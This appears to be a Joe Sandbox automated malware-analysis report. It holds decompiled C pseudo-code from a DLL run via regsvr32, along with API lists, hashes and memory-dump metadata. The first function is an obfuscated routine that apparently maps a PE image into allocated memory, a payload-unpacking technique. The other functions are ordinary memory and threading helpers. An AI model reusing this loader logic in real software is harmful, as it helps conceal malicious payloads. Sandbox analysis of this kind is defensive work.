                                                                        													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
                                                                        													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
                                                                        													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
                                                                        													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
                                                                        													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
                                                                        													_t423 =  *0x1004b0e8; // 0x0
                                                                        													_t736 =  *0x1004b0e4; // 0x0
                                                                        													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
                                                                        													_t1169 =  *0x1004b0ec; // 0x0
                                                                        													_t425 =  *0x1004b0e4; // 0x0
                                                                        													_t738 =  *0x1004b0e0; // 0x0
                                                                        													_t587 =  *0x1004b0d8; // 0x0
                                                                        													_t739 =  *0x1004b0e8; // 0x0
                                                                        													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
                                                                        													_t867 =  *0x1004b0e0; // 0x0
                                                                        													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
                                                                        													_t1251 = _t1250 + 8;
                                                                        													if(_t433 == 0) {
                                                                        														L31:
                                                                        														_push(_t1066);
                                                                        														E10004DD0();
                                                                        														goto L32;
                                                                        													} else {
                                                                        														_t743 =  *0x1004b0e0; // 0x0
                                                                        														_t436 =  *0x1004b0e8; // 0x0
                                                                        														_t437 =  *0x1004b0dc; // 0x0
                                                                        														_t752 =  *0x1004b0e0; // 0x0
                                                                        														_t1170 =  *0x1004b0e4; // 0x0
                                                                        														_t438 =  *0x1004b0e8; // 0x0
                                                                        														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
                                                                        														_t754 =  *0x1004b0dc; // 0x0
                                                                        														_t590 =  *0x1004b0d8; // 0x0
                                                                        														_t1174 =  *0x1004b0d8; // 0x0
                                                                        														 *(_t1251 + 0x34) = _t441;
                                                                        														_t442 =  *0x1004b0e8; // 0x0
                                                                        														_t888 =  *0x1004b0e4; // 0x0
                                                                        														_t444 =  *0x1004b0ec; // 0x0
                                                                        														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
                                                                        														_t604 =  *0x1004b0d8; // 0x0
                                                                        														_t756 =  *0x1004b0dc; // 0x0
                                                                        														_t448 =  *0x1004b0e0; // 0x0
                                                                        														_t890 =  *0x1004b0ec; // 0x0
                                                                        														_t891 =  *0x1004b0d8; // 0x0
                                                                        														_t279 = _t448 + 0x2e9; // 0x2e9
                                                                        														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
                                                                        														 *_t1066 = _t453;
                                                                        														_t759 =  *0x1004b0e4; // 0x0
                                                                        														_t1184 =  *0x1004b0e0; // 0x0
                                                                        														_t895 =  *0x1004b0e8; // 0x0
                                                                        														_t1187 =  *0x1004b0ec; // 0x0
                                                                        														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
                                                                        														_t900 =  *0x1004b0e8; // 0x0
                                                                        														_t454 =  *0x1004b0e4; // 0x0
                                                                        														_t761 =  *0x1004b0ec; // 0x0
                                                                        														_t624 =  *0x1004b0d8; // 0x0
                                                                        														_t293 = _t624 + 1; // 0x1
                                                                        														_t463 =  *0x1004b0e0; // 0x0
                                                                        														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
                                                                        														_push(_t951);
                                                                        														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
                                                                        														_push( *((intOrPtr*)(_t1251 + 0x84)));
                                                                        														_t467 = E10002CA0();
                                                                        														_t1251 = _t1251 + 0x30;
                                                                        														if(_t467 == 0) {
                                                                        															goto L31;
                                                                        														} else {
                                                                        															_t468 =  *0x1004b0e8; // 0x0
                                                                        															_t765 =  *0x1004b0d8; // 0x0
                                                                        															_t1200 =  *0x1004b0dc; // 0x0
                                                                        															_t903 =  *0x1004b0e4; // 0x0
                                                                        															_t905 =  *0x1004b0ec; // 0x0
                                                                        															_t1202 = _t765 - _t905 + _t905;
                                                                        															_t907 =  *0x1004b0dc; // 0x0
                                                                        															_t299 = _t1202 - 2; // -2
                                                                        															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
                                                                        															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
                                                                        															if(_t636 == 0) {
                                                                        																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
                                                                        															} else {
                                                                        																_t963 =  *0x1004b0e0; // 0x0
                                                                        																_t1227 =  *0x1004b0e4; // 0x0
                                                                        																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
                                                                        																_t970 =  *0x1004b0e0; // 0x0
                                                                        																_t971 =  *0x1004b0e4; // 0x0
                                                                        																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
                                                                        																_t492 = E10003B80();
                                                                        																_t924 =  *0x1004b0e0; // 0x0
                                                                        																_t1251 = _t1251 + 8;
                                                                        																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
                                                                        															}
                                                                        															_t469 =  *0x1004b0e4; // 0x0
                                                                        															_t766 =  *0x1004b0e0; // 0x0
                                                                        															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
                                                                        															_t473 = E10003F40();
                                                                        															_t1251 = _t1251 + 4;
                                                                        															if(_t473 == 0) {
                                                                        																goto L31;
                                                                        															} else {
                                                                        																_t474 =  *0x1004b0e8; // 0x0
                                                                        																_t770 =  *0x1004b0dc; // 0x0
                                                                        																_t637 =  *0x1004b0e4; // 0x0
                                                                        																_t318 = _t474 * 2; // 0x1
                                                                        																_t954 =  *0x1004b0ec; // 0x0
                                                                        																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
                                                                        																_t475 = E10003570();
                                                                        																_t1251 = _t1251 + 4;
                                                                        																if(_t475 == 0) {
                                                                        																	goto L31;
                                                                        																} else {
                                                                        																	_t913 =  *0x1004b0e0; // 0x0
                                                                        																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
                                                                        																	_t476 = E10003AD0();
                                                                        																	_t1251 = _t1251 + 4;
                                                                        																	if(_t476 != 0) {
                                                                        																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
                                                                        																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
                                                                        																		if(_t478 == 0) {
                                                                        																			 *(_t1066 + 0x38) = 0;
                                                                        																			return _t1066;
                                                                        																		} else {
                                                                        																			if( *(_t1066 + 0x14) == 0) {
                                                                        																				_t481 =  *0x1004b0d8; // 0x0
                                                                        																				_t955 =  *0x1004b0e0; // 0x0
                                                                        																				_t918 =  *0x1004b0ec; // 0x0
                                                                        																				_t778 =  *0x1004b0e8; // 0x0
                                                                        																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
                                                                        																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
                                                                        																				return _t1066;
                                                                        																			} else {
                                                                        																				_t780 =  *0x1004b0ec; // 0x0
                                                                        																				_t921 =  *0x1004b0d8; // 0x0
                                                                        																				_t956 =  *0x1004b0e4; // 0x0
                                                                        																				_t642 =  *0x1004b0dc; // 0x0
                                                                        																				_t962 =  *0x1004b0e0; // 0x0
                                                                        																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
                                                                        																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
                                                                        																				return _t1066;
                                                                        																			}
                                                                        																		}
                                                                        																	} else {
                                                                        																		goto L31;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t1067 =  *0x1004b0d8; // 0x0
                                                                        													_t928 =  *0x1004b0dc; // 0x0
                                                                        													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
                                                                        													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
                                                                        													return 0;
                                                                        												}
                                                                        											} else {
                                                                        												_t789 =  *0x1004b0e4; // 0x0
                                                                        												_t930 =  *0x1004b0dc; // 0x0
                                                                        												_t1075 =  *0x1004b0d8; // 0x0
                                                                        												_t1076 =  *0x1004b0ec; // 0x0
                                                                        												_t194 = _t1076 - 4; // -4
                                                                        												_t665 =  *0x1004b0e8; // 0x0
                                                                        												_t498 =  *0x1004b0e0; // 0x0
                                                                        												_t1084 =  *0x1004b0d8; // 0x0
                                                                        												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
                                                                        												_t200 = _t1084 + 2; // 0x2
                                                                        												_t1085 =  *0x1004b0ec; // 0x0
                                                                        												_t668 =  *0x1004b0d8; // 0x0
                                                                        												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
                                                                        												_t520 =  *0x1004b0e0; // 0x0
                                                                        												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
                                                                        												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
                                                                        												_t1250 = _t1250 + 0x14;
                                                                        												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
                                                                        												if(_t523 == 0) {
                                                                        													goto L32;
                                                                        												} else {
                                                                        													_t585 = _t523;
                                                                        													goto L21;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x10005f4e
                                                                        0x10005f53
                                                                        0x10005f53
                                                                        0x10005f5f
                                                                        0x10005f79
                                                                        0x10005f86
                                                                        0x10005f87
                                                                        0x10005f8c
                                                                        0x10005f91
                                                                        0x00000000
                                                                        0x10005f93
                                                                        0x10005f93
                                                                        0x10005f98
                                                                        0x10005f9e
                                                                        0x10005fa4
                                                                        0x10005fc1
                                                                        0x10005fd5
                                                                        0x10005fd6
                                                                        0x10005fdb
                                                                        0x10005fe0
                                                                        0x00000000
                                                                        0x10005fe2
                                                                        0x10005fe2
                                                                        0x10005ffb
                                                                        0x10005ffc
                                                                        0x10006001
                                                                        0x10006006
                                                                        0x1000601d
                                                                        0x10006022
                                                                        0x10006026
                                                                        0x1000610e
                                                                        0x1000611d
                                                                        0x1000602c
                                                                        0x10006031
                                                                        0x100060a5
                                                                        0x100060aa
                                                                        0x100060b0
                                                                        0x100060c4
                                                                        0x100060d4
                                                                        0x10006101
                                                                        0x1000610c
                                                                        0x10006033
                                                                        0x10006033
                                                                        0x10006039
                                                                        0x1000603f
                                                                        0x10006045
                                                                        0x1000606d
                                                                        0x1000608f
                                                                        0x10006095
                                                                        0x100060a4
                                                                        0x100060a4
                                                                        0x10006031
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006006
                                                                        0x10005fe0
                                                                        0x10005f91
                                                                        0x10005e5a
                                                                        0x10005a9d
                                                                        0x10005aa1
                                                                        0x10005aa8
                                                                        0x10005acc
                                                                        0x10005ad7
                                                                        0x10005ae7
                                                                        0x10005ae7
                                                                        0x1000591a
                                                                        0x1000591a
                                                                        0x10005920
                                                                        0x1000592b
                                                                        0x10005936
                                                                        0x10005943
                                                                        0x10005947
                                                                        0x10005957
                                                                        0x10005981
                                                                        0x10005989
                                                                        0x1000598d
                                                                        0x100059a0
                                                                        0x100059ae
                                                                        0x100059cb
                                                                        0x100059d2
                                                                        0x100059e7
                                                                        0x100059f1
                                                                        0x100059f3
                                                                        0x100059f8
                                                                        0x100059fc
                                                                        0x00000000
                                                                        0x10005a02
                                                                        0x10005a02
                                                                        0x00000000
                                                                        0x10005a02
                                                                        0x100059fc
                                                                        0x10005914
                                                                        0x10005803
                                                                        0x10005505
                                                                        0x100054cb
                                                                        0x10005488
                                                                        0x10005409
                                                                        0x10005361

                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 100056FB
                                                                        • GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 10005A72
                                                                        • memcpy.MSVCRT ref: 10005CEC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1755227880-0
                                                                        • Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                        • Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
                                                                        • Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                        • Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 83%
                                                                        			E10037446(signed char* __ecx) {
                                                                        				struct _CRITICAL_SECTION* _v8;
                                                                        				void* _v12;
                                                                        				char _v32;
                                                                        				char _v40;
                                                                        				char _v48;
                                                                        				signed int __edi;
                                                                        				void* __esi;
                                                                        				struct _CRITICAL_SECTION* _t42;
                                                                        				intOrPtr _t43;
                                                                        				void* _t44;
                                                                        				void* _t45;
                                                                        				void* _t49;
                                                                        				void* _t50;
                                                                        				signed int _t71;
                                                                        				signed char* _t73;
                                                                        				signed int _t82;
                                                                        				signed char* _t85;
                                                                        				void* _t87;
                                                                        				void* _t89;
                                                                        				void* _t91;
                                                                        				void* _t92;
                                                                        				void* _t94;
                                                                        
                                                                        				_t73 = __ecx;
                                                                        				_t89 = _t94;
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t85 = __ecx;
                                                                        				_t1 = _t85 + 0x1c; // 0x1004f010
                                                                        				_t42 = _t1;
                                                                        				_v8 = _t42;
                                                                        				EnterCriticalSection(_t42);
                                                                        				_t3 = _t85 + 4; // 0x20
                                                                        				_t43 =  *_t3;
                                                                        				_t4 = _t85 + 8; // 0x3
                                                                        				if( *_t4 >= _t43) {
                                                                        					L6:
                                                                        					_t82 = 1;
                                                                        					if(_t43 <= 1) {
                                                                        						L11:
                                                                        						_t20 = _t43 + 0x20; // 0x40
                                                                        						_t71 = _t20;
                                                                        						_t21 = _t85 + 0x10; // 0x2f46400
                                                                        						_t44 =  *_t21;
                                                                        						if(_t44 != 0) {
                                                                        							_t45 = GlobalHandle(_t44);
                                                                        							_v12 = _t45;
                                                                        							GlobalUnlock(_t45);
                                                                        							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
                                                                        						} else {
                                                                        							_t49 = GlobalAlloc(2, _t71 << 3); // executed
                                                                        						}
                                                                        						if(_t49 != 0) {
                                                                        							_t50 = GlobalLock(_t49);
                                                                        							_t26 = _t85 + 4; // 0x20
                                                                        							_v12 = _t50;
                                                                        							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
                                                                        							 *(_t85 + 4) = _t71;
                                                                        							 *(_t85 + 0x10) = _v12;
                                                                        							goto L19;
                                                                        						} else {
                                                                        							_t24 = _t85 + 0x10; // 0x2f46400
                                                                        							_t87 =  *_t24;
                                                                        							if(_t87 != 0) {
                                                                        								GlobalLock(GlobalHandle(_t87));
                                                                        							}
                                                                        							LeaveCriticalSection(_v8);
                                                                        							_push(_t89);
                                                                        							_t91 = _t94;
                                                                        							_push(_t73);
                                                                        							_v32 = 0x1004d418;
                                                                        							E10011C0F( &_v32, 0x10045dc0);
                                                                        							asm("int3");
                                                                        							_push(_t91);
                                                                        							_t92 = _t94;
                                                                        							_push(_t73);
                                                                        							_v40 = 0x1004d4b0;
                                                                        							E10011C0F( &_v40, 0x10045e04);
                                                                        							asm("int3");
                                                                        							_push(_t92);
                                                                        							_push(_t73);
                                                                        							_v48 = 0x1004d548;
                                                                        							E10011C0F( &_v48, 0x10045e48);
                                                                        							asm("int3");
                                                                        							return _t73[0x70];
                                                                        						}
                                                                        					} else {
                                                                        						_t17 = _t85 + 0x10; // 0x2f46400
                                                                        						_t73 =  *_t17 + 8;
                                                                        						while(( *_t73 & 0x00000001) != 0) {
                                                                        							_t82 = _t82 + 1;
                                                                        							_t73 =  &(_t73[8]);
                                                                        							if(_t82 < _t43) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						if(_t82 < _t43) {
                                                                        							goto L19;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t12 = __esi + 0x10; // 0x2f46400
                                                                        					__ecx =  *_t12;
                                                                        					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
                                                                        						L19:
                                                                        						_t33 = _t85 + 0xc; // 0x3
                                                                        						if(_t82 >=  *_t33) {
                                                                        							_t34 = _t82 + 1; // 0x4
                                                                        							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
                                                                        						}
                                                                        						_t36 = _t85 + 0x10; // 0x2f46400
                                                                        						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
                                                                        						_t40 = _t82 + 1; // 0x4
                                                                        						 *((intOrPtr*)(_t85 + 8)) = _t40;
                                                                        						LeaveCriticalSection(_v8);
                                                                        						return _t82;
                                                                        					} else {
                                                                        						goto L6;
                                                                        					}
                                                                        				}
                                                                        			}


























                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
                                                                        • GlobalAlloc.KERNELBASE(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
                                                                        • GlobalHandle.KERNEL32(02F46400), ref: 100374B1
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
                                                                        • GlobalReAlloc.KERNEL32 ref: 100374CF
                                                                        • GlobalHandle.KERNEL32(02F46400), ref: 100374E1
                                                                        • GlobalLock.KERNEL32 ref: 100374E8
                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
                                                                        • GlobalLock.KERNEL32 ref: 100374FD
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10037545
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                        • String ID:
                                                                        • API String ID: 2667261700-0
                                                                        • Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                        • Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
                                                                        • Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                        • Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 100%
                                                                        			E10013AD4() {
                                                                        				int _t2;
                                                                        				void* _t8;
                                                                        				void* _t14;
                                                                        				void** _t15;
                                                                        				void* _t21;
                                                                        				void* _t23;
                                                                        
                                                                        				if( *0x10050a64 == 3) {
                                                                        					_t8 = 0;
                                                                        					_t21 =  *0x10050a48 - _t8; // 0x0
                                                                        					if(_t21 > 0) {
                                                                        						_t14 =  *0x10050a4c; // 0x0
                                                                        						_t15 = _t14 + 0xc;
                                                                        						do {
                                                                        							VirtualFree( *_t15, 0x100000, 0x4000);
                                                                        							VirtualFree( *_t15, 0, 0x8000);
                                                                        							HeapFree( *0x10050a60, 0, _t15[1]);
                                                                        							_t15 =  &(_t15[5]);
                                                                        							_t8 = _t8 + 1;
                                                                        							_t23 = _t8 -  *0x10050a48; // 0x0
                                                                        						} while (_t23 < 0);
                                                                        					}
                                                                        					HeapFree( *0x10050a60, 0,  *0x10050a4c);
                                                                        				}
                                                                        				_t2 = HeapDestroy( *0x10050a60); // executed
                                                                        				return _t2;
                                                                        			}










                                                                        APIs
                                                                        • VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
                                                                        • VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
                                                                        • HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
                                                                        • HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
                                                                        • HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Heap$Virtual$Destroy
                                                                        • String ID:
                                                                        • API String ID: 782257640-0
                                                                        • Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                        • Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
                                                                        • Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                        • Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E100350EA(intOrPtr __ecx, void* __eflags) {
                                                                        				void* _t37;
                                                                        				intOrPtr _t54;
                                                                        				void* _t56;
                                                                        
                                                                        				E10011BF0(0x1003a421, _t56);
                                                                        				_push(__ecx);
                                                                        				_t54 = __ecx;
                                                                        				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
                                                                        				E10035766(__ecx, __eflags); // executed
                                                                        				 *((intOrPtr*)(_t56 - 4)) = 0;
                                                                        				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
                                                                        				if( *((intOrPtr*)(_t56 + 8)) == 0) {
                                                                        					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
                                                                        				}
                                                                        				_t37 = E100373B5();
                                                                        				_t44 = _t37;
                                                                        				_push(0x10035062);
                                                                        				_t7 = _t44 + 0x1070; // 0x1070
                                                                        				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
                                                                        				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
                                                                        				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
                                                                        				 *((intOrPtr*)(_t37 + 4)) = _t54;
                                                                        				 *((intOrPtr*)(_t54 + 0x40)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x78)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x60)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x64)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x50)) = 0;
                                                                        				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
